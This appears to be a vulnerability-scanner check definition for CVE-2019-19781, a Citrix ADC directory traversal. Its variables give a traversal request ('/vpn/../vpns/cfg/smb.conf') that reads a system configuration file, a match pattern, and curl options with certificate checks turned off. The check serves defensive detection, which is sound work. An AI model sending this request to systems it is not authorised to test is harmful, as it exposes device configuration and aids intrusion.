AUTHOR='@xer0dayz' VULN_NAME='CVE-2019-19781 - Citrix ADC Directory Traversal' URI='/vpn/../vpns/cfg/smb.conf' METHOD='GET' MATCH='\[global\]' SEVERITY='P1 - CRITICAL' CURL_OPTS="--user-agent '' -s -L --insecure" SECONDARY_COMMANDS='' GREP_OPTIONS='-i'